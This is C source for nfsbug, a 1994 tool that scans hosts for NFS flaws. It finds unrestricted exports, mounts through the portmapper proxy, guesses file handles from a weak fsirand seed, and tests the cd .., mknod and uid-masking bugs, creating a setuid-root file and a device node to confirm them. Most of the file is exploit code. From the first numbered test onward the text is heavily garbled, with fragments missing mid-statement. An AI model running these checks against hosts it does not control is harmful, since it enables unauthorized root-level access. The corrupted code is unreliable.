/*
 * nfsbug.c
 *
 * Test hosts for well known NFS problems/bugs. Among these tests are:
 * find world wide exportable file systems, determine whether the
 * export list really works, determine whether we can mount file systems
 * through the portmapper, try to guess file handles, excercise the
 * mknod bug, and the uid masking bug.
 *
 * Author:
 *      Leendert van Doorn, april 1994
 *
 * TODO:
 *      - close sockets (?)
 */
#include <stdio.h>
#include <ctype.h>
#include <netdb.h>
#include <errno.h>
#include <rpc/rpc.h>
#ifdef SVR4
#include <rpc/clnt_soc.h>
#endif
#include <sys/param.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/sysmacros.h>
#include <sys/time.h>
#include <sys/vnode.h>
#include <sys/vfs.h>
#include <sys/sysmacros.h>
#ifdef SVR4
#include <sys/inode.h>
#else
#ifndef HPUX
#include <ufs/inode.h>
#endif
#endif
 
#include "mount.h"
#include "nfs_prot.h"
 
#ifndef TRUE
#define TRUE    1
#define FALSE   0
#endif
 
#ifdef SVR4
#define bzero(s,n)      memset((s), 0, (n))
#define bcopy(a,b,c)    memcpy(b,a,c)
#endif
 
/*
 * Something that is unlikely to appear in the
 * remote NFS server's name space.
 */
#define VERY_UNLIKELY_FILE_NAME "bongo"
 
char *bongo;
 
/*
 * This random seed is the constant value that the
 * uninitialized variable ``timeval'' in fsirand contains.
 */
#define SUN4_RANDOM     (0 + 32)
 
/*
 * Disk device descriptor (major/minor)
 */
#define NMINORS         16
struct disk {
    int dsk_maj;                /* major disk device number */
    int dsk_min[NMINORS];       /* minor device table */
};
 
/*
 * Device descriptor
 */
#define NDISKS          4
struct device {
    long dev_random;            /* machine specific random seed */
    int dev_pid;                /* maximum pid to look at */
    struct disk dev_disks[NDISKS]; /* disk table */
};
 
/*
 * The device table
 */
#define NDEVICES        (sizeof(device)/sizeof(struct device))
struct device device[] = {
    { SUN4_RANDOM, 2000,
        {
            { 10,   /* /dev/xd[01][a-h] */
                { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 } },
            { 7,    /* /dev/sd[01][a-h] */
                { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 } },
            { 22,   /* /dev/id00[01][a-h] */
                { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 } },
            { 3,    /* /dev/xy[01][a-h] */
                { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 } },
        }
    },
    { 0 }
};
 
/*
 * File system types, these correspond to entries in fsconf
 */
#define MOUNT_UFS       1
#define MOUNT_NFS       2
#define MOUNT_PC        3
#define MOUNT_LO        4
#define MOUNT_TFS       5
#define MOUNT_TMP       6
 
/*
 * This struct is only used to find the size of the data field in the
 * fhandle structure below.
 */
struct fhsize {
    fsid_t  f1;
    u_short f2;
    char    f3[4];
    u_short f4;
    char    f5[4];
};
#define NFS_FHMAXDATA   ((NFS_FHSIZE - sizeof (struct fhsize) + 8) / 2)
 
struct svcfh {
    fsid_t  fh_fsid;                /* filesystem id */
    u_short fh_len;                 /* file number length */
    char    fh_data[NFS_FHMAXDATA]; /* and data */
    u_short fh_xlen;                /* export file number length */
    char    fh_xdata[NFS_FHMAXDATA]; /* and data */
};
 
char *program;
int verbose = 0;
int mountcheck = TRUE;                  /* simple export checks */
int portmapcheck = TRUE;                /* portmapper mount checks */
int handlecheck = TRUE;                 /* handle guessing */
struct timeval timeout = { 30, 0 };     /* default time-out value */
 
void usage();
void nfsbug();
AUTH *create_unix_auth();
fhstatus *pmap_mnt();
char *nfs_error();
void makehandle(), printhandle();
 
main(argc, argv)
    int argc;
    char **argv;
{
    int i, opt;
    extern int optind;
 
    program = argv[0];
    while ((opt = getopt(argc, argv, "mphv")) != EOF) {
        switch (opt) {
        case 'm':
            mountcheck = !mountcheck;
            break;
        case 'p':
            portmapcheck = !portmapcheck;
            break;
        case 'h':
            handlecheck = !handlecheck;
            break;
        case 'v':
            verbose++;
            break;
        default:
            usage();
        }
    }
    if (optind == argc)
        usage();
 
    for (i = optind; i < argc; i++)
        nfsbug(argv[i]);
}
 
void
usage()
{
    fprintf(stderr, "Usage: %s [-mphv] host ...\n", program);
    exit(1);
}
 
/*
 * Detect and report a number of well known NFS bugs
 */
void
nfsbug(host)
    char *host;
{
    struct sockaddr_in server_addr, addr;
    CLIENT *mntclient, *nfsclient;
    fhstatus *mountpoint;
    exports ex, *exp;
    attrstat *res;
    groups gr;
    int sock;
    char *proto;
 
    /* hosts can either be symbolic names or real IP addresses */
    if (isdigit(*host)) {
        server_addr.sin_addr.s_addr = inet_addr(host);
    } else {
        struct hostent *hp = gethostbyname(host);
        if (hp == NULL) {
            fprintf(stderr, "%s: %s: unknown host\n", program, host);
            return;
        }
        bcopy(hp->h_addr, (char *)&server_addr.sin_addr.s_addr, hp->h_length);
        host = hp->h_name;
    }
    server_addr.sin_family = AF_INET;
    server_addr.sin_port = 0;
 
    /*
     * Talk to the remote mount daemon. First try a TCP stream before
     * using UDP. TCP deals large packets better than UDP, besides TCP
     * performs better over long haul networks :-)
     */
    sock = RPC_ANYSOCK;
    addr = server_addr; /* gets garbaged */
    if ((mntclient = clnttcp_create(&addr,
      MOUNTPROG, MOUNTVERS, &sock, 0, 0)) == (CLIENT *)0) {
        if (sock != RPC_ANYSOCK)
           close(sock);
        sock = RPC_ANYSOCK;
        addr = server_addr; /* gets garbaged */
        if ((mntclient = clntudp_create(&addr,
          MOUNTPROG, MOUNTVERS, timeout, &sock)) == (CLIENT *)0) {
            clnt_pcreateerror("mount");
            return;
        }
        proto = "UDP/IP";
    } else
        proto = "TCP/IP";
 
    clnt_control(mntclient, CLSET_TIMEOUT, &timeout);
    mntclient->cl_auth = create_unix_auth(0, 0);
    if (mntclient->cl_auth == NULL) {
        clnt_destroy(mntclient);
        return;
    }
    mntclient->cl_auth = create_unix_auth(-2, -2); /* well known uid, gid */
    if (mntclient->cl_auth == NULL) {
        clnt_destroy(mntclient);
        return;
    }
    if (verbose)
        printf("Connected to NFS mount daemon at %s using %s\n", host, proto);
 
    /*
     * Set up a connection with the NFS server. Again, first try TCP
     * and then UDP. I must admit, I haven't see that many NFS servers
     * that talk TCP.
     */
    sock = RPC_ANYSOCK;
    addr = server_addr; /* gets garbaged */
    if ((nfsclient = clnttcp_create(&addr,
      NFS_PROGRAM, NFS_VERSION, &sock, 0, 0)) == (CLIENT *)0) {
        if (sock != RPC_ANYSOCK)
           close(sock);
        sock = RPC_ANYSOCK;
        addr = server_addr; /* gets garbaged */
        if ((nfsclient = clntudp_create(&addr,
          NFS_PROGRAM, NFS_VERSION, timeout, &sock)) == (CLIENT *)0) {
            clnt_pcreateerror("nfs clntudp_create");
            clnt_destroy(mntclient);
            return;
        }
        proto = "UDP/IP";
    } else
        proto = "TCP/IP";
 
    clnt_control(nfsclient, CLSET_TIMEOUT, &timeout);
    nfsclient->cl_auth = create_unix_auth(-2, -2); /* well known uid, gid */
    if (nfsclient->cl_auth == NULL) {
        clnt_destroy(nfsclient);
        clnt_destroy(mntclient);
        return;
    }
    if (verbose)
        printf("Connected to NFS server at %s using %s\n", host, proto);
 
    /*
     * Get the NFS export list. From this we extract the file systems
     * we try to mount.
     */
    if ((exp = mountproc_export_1(NULL, mntclient)) == NULL) {
        clnt_perror(mntclient, "mountproc_export");
        clnt_destroy(mntclient);
        return;
    }
    if (verbose > 2) {
        for (ex = *exp; ex != NULL; ex = ex->ex_next) {
            printf("%-25s", ex->ex_dir);
            if ((int)strlen(ex->ex_dir) >= 25)
                printf("\n                    ");
            if ((gr = ex->ex_groups) == NULL)
                printf("everyone");
            while (gr) {
                printf("%s ", gr->gr_name);
                gr = gr->gr_next;
            }
            putchar('\n');
        }
    }
 
    /*
     * 1. A number of problems exist here: Either the SA is terribly sloppy
     *    and didn't care to set the export list for a file system, the
     *    remote e old 256 btes bug, or we're simply
     *his file system. In either case we j    *    o mount them and rcceeded.
     */
prin"); fflush(stdout);
        for (ex = ex->ex_next) o = "/home/sunset/>e     printf("ex->ex_dir=%s\n", ex->ex_dir);
            printf("bosh(stout);
            mou_1(&ex->ex_dir, mntclient);
            if mountpoint &s == NFS_OK) {res = nfsproc_getattr_2(mountpoint->fhstatus_u.fhs_dle,
                              if (res&& res->status == NFS_OK) {
                    printfEM %s:%s ", host, ex-           LL)
                        printf("no export restrictions)");
               ether we're in the export li   putc         exercise(mountpoint->fhstatus_t,
                        hos
 if (erb) {
                    printf("Handle for %s failed: %\n",
         ->ex_dir, nfs_error(re->status));
                }
                modir, mntclient);
           } else if (verbose && m     prin
                   ex->eoint->fhs_status));
        }
    }
 
    unt the file systemsusing the proxy RPC funcovided by the portmapper. This problem occurs when the export
     *    list is refexive, i.e. n it.
     */
    if (p for (ex = *exp; ex != NULL;          mountpoint = pmap_mnt(&ex->ex_dir, &servif (mountpoint && moutpoint->fhs_status == NFS_O              res = nfsproc_getatr_2(mountpoint->fhstatus_u.fhs_fhan       nfsclient);
               if (re_OK) {
             E FILE SYSTr)\n",
                   dir);
     e(mountpoint->fhstatus_u.fh  st, ex->ex_dir);
                    /* no unmount */
       } else if (verose && res) {
              s: %s\n",
                        e->eoint->fhs_status));
                   }
    }
 
to obaiy guessing them. By far the
     *    most elaborate attack among this st, alobably the
     *    less succesful. Ba initialization problem in fsiranode generation nuiable pe handle) gets inibeween 0 and 30000,
     *    but in practice this is a number betwen 100..2000e vice minensional
     *    matrix which we raverse. So far I haven't sorted oroper values for different kind ofmachinery, only those which
     *   round.
     */
    ifcheck) {
rut device *devp;
              register int dsk;
        registe st register int min, maj;
        fhandle han
        int n;
 
        for (devp = device; devp < &device[NDE) {
            for (frpid = 0; f; frpid++) {
              * We are looking for the goe 2,
                 * the root i-node of a fithe easiet
                 * because it is thel case in which the same i-node
                 * appears twice in theoot fs i-node and
                 * target i-node).
               * The followig magic isndom generator
     ry in the snd program might
         ven thatit han).
                 */
           srand(frpid + evp->dev_random);
             for (n = frpid; n--; ) (void) rand();
                (void) rand(); /* inode            (void) rand(); /* inode 1 *= rand();
#else
               s     srandom(frpid + devp->dev_ranfor (n = frpid; n
      ); /* inode 0 */
random(); /* inode 1 */
               gen = random();
#endif
 
       &         and pid = %d, gen = %ld\n", frpid, gen);
 
                for (dsk = KS; dsk++) {
           v_disks[d   maj = dp->dsk_maj;
                    for (min = 0; min < N
                        makehandle(handle,
        , dp->dsk_in[min], 2, gen, 2, gen)      res = nfsprsclient     if (re && res->stat                      printf("GUESSABLE FILE HANDLE %s: "
                            printhandle(h);
                            printf("\n");
            exercise(handle, nfsclient, host, "<unkn              break;/* got it for this minor de          }
                    }
       }
        }
    }
client->cl_auth);
    clnt_destroy(nfsclientclient->cl_auth);
    clnt_destroy * Exercise then'' bugs
 */
xercise(handl host, dir);
    cl, *dir;
ourse when the uid bug works there's nt much point
     * in testing the mkn/
 
    if (uidbug(handle,client)) 
        printf("UID .. BUG: %s:%s\n (mknodbug(hanle, client))
        printf("MKNOD .. B);
    if (cdbug(handle, client))
       printf("CHDIR .. BUG: %s:%s\n", host The chdi NFS implemetation has the nice feature
 *    that cd .. on an exported file system (where the exported  *    the physi the parent directory handle even  exported. This is particularry worrisome on diskless clients where
 *    you have root access to your own NFS mounted root, *    other physif you (and down from there; e.g. the
 *    root file systems of o/
int
cdbughandle, client)
    fhandle *handle;
    CLIENT  svcfh *fh = (structsvcfh *) handle;
    diropargs dargs;
res;
    attrstat *ares;
 
    /*
     * This only works for non physical UFS 
     * iod don't know about oher file
/
#ifdef  HPid[1] != MOUNT_UFS)
        return FALSE;
#else
    if] != MOUNT_UFS)
        return FALSE;
#end&fh->fh_data[2]) !=E;
 
    /* get the file handle forame = "..";
    bcopy(handle,&dargs.dir, NFes = nfsproc_lookup_2(&dargs, client);!dres |K)
       * make ides = nfspoc_getattr_2(&dres->diropres_u.diropres.file, client);
    rturn ares &K;
}
 
/*
 * 5. The mknod entations allow you to turn
 *    creat any valiry
 *   user to make new devices. It doesn't take a genius to figure
 *    out hat.
 *
 *   CAVEAT: this code doesn't work if it cannot write the root direct*    I'm not in the mood today to write code that traverses th
 *    it finds a writable dodbug(handle, client)
    fhand *client;
{
    diroparg*res;
    attrstat *ares;
    createargs cargs;
 
try to create a device inthe root directory.
     * For this we need thend gid.
     */
 
    ahandle, client);
    if (!ares || ares->status !
        return FALSE  * Cre0
     */
    memcpy(&cargs.where.df(*handle));
    cargs.where.name = VERY_UNLIKELY_FILE_NAME;.attributes.mode = IFCHR;
    cargs.attributes.size = makedev(,0);
 
    if (ares.uid)
       cargs.attributes.uid = ares.uid;
    else
        cargs.attributes.uid = -2;
 
    if (ares->attrstat_u.  cargs.attributes.gid = ares->attrstat_uattributes.gid;
    else
        cargs;
 
    dres = nfsproc_creae_2(&cargs, cl || dres->status return FA * Apparently it worked, make sure   dargs.name = VERY_UNLIKELY_FILrgs.dir, hande, sizeof(*handle));
    dresrgs, client);
    if != NFS_K)
     le or VERY_UNLIKELY_FILE_NAME */
    dargs.name = ;
    bcopy(handle, &dags.dir, NFS_FHSIZE)res = nfsproc_lookup_2(&dargs, client);
    if->status != NFS_OK)
        return FALSE;
 
    * mae device we created */
    ares = nfsproc_getattr_2(&dres->diropres_;
    if (!ares || ares->status != NFS_OK)
        retur->attrsta_u.attributes.mode & IFMT) != IFCHR)
        return FALSE;
    if (ares->attrs= akedev(0, 0))
        return FAt did, lets delete it */
 
 VERY_UNLIKELY_FILE_Ny(&dargs.dir, handle, sizeof(*handle));
   oc_remove_2(&dargs, client);
*/
 
    return TRUE;d bug ... Beause of some stupid masking problem with
 *    uids (i.e. uid is 16 passed ioot che32 bit value BEFORE maskng)
 *    it very easy to masquarade as rooandle, cliet)
    CLIENTargs dargs;
   diropres res;
    createargs cargs;
      int iid/* this becomes 0 after masking it */
    auth = client->cclnix_auth(id, id);
 
    /*
     * Creatth uid 0, gid 0
     */
    crgs.where.na_NAME; 
    memcpy(&cargs.where.dir, hand   cargs.attributes.mode = 6775;
    ca;
 = id;
    cargs.attributes.size = -1;
    cargs.attributes.atime.seconds = -1;
ime.useconds = -1;
    cargs.attributes.mtime.seconds = -1;
    c.attributes.mt dres = nfsproccreate_2(&cargs,s || dres->status != NFS_OK) {
        autt);
        client->cl_auth = auth;
        return FALSE;
    }
 
 
    /*
 ed, make sure it did ...
     RY_UNLIKELY_FILE_NAME;
 handle,sies = nfspront);
    if (!dres || dr
        auth_destroy(client->cl_auth);
    h = auth;
        return FALSE;
    }
 get _UNLIKELY_FILE_NAME */
   KELY_FILE_NAME;
    bcopy(handle, &dargs.dir, NFSFHSIZE);
    drdargs, client);
    if (!drNFALSE;
 
    /* make sure t is re ares = nfsproc_getattr_2(&dres->diropres_u.diropres.file, clieaes->status != NFS_OK)
       (ares->attrstat_u.attributes.ui return FALSE;
    if (ares->attrstat_u.attributes.gid != 0)
        return FALSE;
 
 
   
    /* it did, lets delete it */
    
    dargs.name = VERY_UNLIKELY_FILE_NAMgs.dir, handle,sizeof(*handle));
    (void) nfsproc_remove_2(&dargs, client);
>cl_auth);
    clien*/
 
    retrn TRUE;
}
 
/*
 * Make a mount call via the port mapper
 */
f, addr)
    dirpath *argp;
 addr;
{
    enum clnt_sta sta res;u_long port;
 
    bzar *)&res, sizeof(res)ap_rmtcall(addr, MOUNTPROG, MOUNTVERS, MOUNTPROC_      xdr_dirpath, argimeoutS) {
        clnt_petuturn &rea handle
 */
oid
makehandle(handle, maj, mien)
    struct svcfh *handle;
    intu, gen;
{
#ifdef  HPUX
    handv(maj, min);
    handlMOUNT_U handle->fh_fsi.val[0] aj, min);
    handl->fFS;
#endif
 
    handle->sh0]) = 0;      /* length */
    *((ino_t *)inum;     /* inde */
    *((long *)&handle->fh_data[6]) = gen;       /* generatdle->fh_xlen = 10;
    *((u_short *)&handle->fh_xdata[0]) = 0;     / length */
>fh_xdata[2]) = rinu((l[6atio}
 
void
printhandle(handle)
    struct sv
{
   register char *p
 
    /* fsid[0] -> major, minor device number */
#ifdef  HPUX
 ",
        majofsidfsid[0]));
#else
    printf("(%d,%d) ",
        major(handle->fh_sid.val[0]), al[0]));
#endif
 
   /* fsid[1] -> file system typeswitch (handle->fh_fsid[1]) {
#ele
    switch (h{
#endif
    case "); MOUNT_NFS: printf( case MOUNT_PC:  prinreak;
    case MOUNT_Leak;
    case MOUNT_TFS: printf("tfs "; break;rintf("tmp "); break;
    default: "); breaknu/
    printf("<%d,%ld,hort *)&handle->fh_data[0]),
   ->fh_data[2])
        *((long);
 
   length, and data */
    printf("<d,%ld,
        *((u_short *)&handle->fh_xdata[0]),
        *((ino_t *)&handle->fh_xdata[2]),
        *((long *)&handle-
n hex-decimal forma
    printf("= <");
    for (i = 0, p =zof(struct     printf(" %02x", *p & 0xFF);
 
/andle with parameters determined by doing lots of
 * syscalls.
 */
AUTH *
crea
   char macNE_NAME + 1];
 ifchname, MAX_MACHINE_NAME) == -1) {
        fprintf(stderr, "create_unix_auth: can");
        return NULL;
    }
    machname[MAX_MACHNE_NAME] = 0;
    gids[uthud, id, 1, gids);
}
 
/
char *
nfs_errtat stt;
{
    switch (stat) {
    cturn "No error";
  
        retrn "Not owner";
    case NFSERR_NOENT:
        return "No such filese NFSERR_O:
        returrror";
    case NFSERR"N";
    case NFSERR_ACCES:
    rmission denied";
    case NFSERR_EXIST:
     
    case NFSERR_NODEV:
        return "ase NFSERR_NOTDI:
        return "Not a directory";
    ca   return "Is a directoIG:
        return "File too large"C:
        return "No space lefton device":
        return "Read-only file system";
    case NFSERR_NAMTOOLONG:
        return "File na  ca  not empty";
    case NFSERR_DQUOT:
        return "Disc quota exceedALE:
        return "Stale NFS file handle";
    case NFSERR_WFLSH:
ache flushed";
    default:
        return "UKNOWN NFS ERROR";
    }
}
